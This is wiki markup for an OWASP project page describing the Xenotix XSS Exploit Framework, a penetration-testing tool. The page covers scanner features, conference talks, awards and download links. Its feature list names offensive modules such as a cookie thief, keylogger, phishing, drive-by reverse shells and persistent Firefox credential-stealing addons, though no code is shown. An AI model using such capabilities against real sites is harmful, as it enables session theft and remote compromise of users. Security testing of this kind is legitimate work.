__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:Download.png

2014-02-12T21:45:39Z

Ajin Abraham: Ajin Abraham uploaded a new version of "File:Download.png"

File:Scripting.png

2014-02-12T21:24:13Z

Ajin Abraham:

File:XenotixV5.png

2014-02-12T21:06:58Z

Ajin Abraham: OWASP Xenotix XSS Exploit Framework V 5

OWASP Xenotix XSS Exploit Framework V 5

OWASP Xenotix XSS Exploit Framework

2014-02-01T19:49:10Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Xenotix XSS Exploit Framework 4.5==

[[Image:Xenotix4.5.png|left|600px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:200px;" |

== QUICK DOWNLOAD ==

[[Image:Button1.png | link=http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar]]
* [https://www.dropbox.com/s/j6fajc73zz0dgje/Xenotix_XSS_Exploit_Framework_v4.5.rar Mirror]

== NEWS AND EVENTS ==
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]
* [[OWASP_AntiSamy_Project]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*Manual Mode Scanner
*Auto Mode Scanner
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Header Scanner
*Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector
</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Nulcon Goa 2013'''
{{#ev:youtube|J1phYXmLX8w}}

'''ClubHack 2013'''
{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]]
|
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]
|
[[Image:WEBKIT DEVELOPER.png|thumb|530px|left|WebKit Developer Tools]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Button1.png | link=http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar]]

*'''Version 4.5 Mirror 2: [https://www.dropbox.com/s/j6fajc73zz0dgje/Xenotix_XSS_Exploit_Framework_v4.5.rar DropBox]
====Older Versions====
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 4.5 Videos'''
OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''
OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''
OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}}
OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}}
OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}

'''Version 2 Videos'''
OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]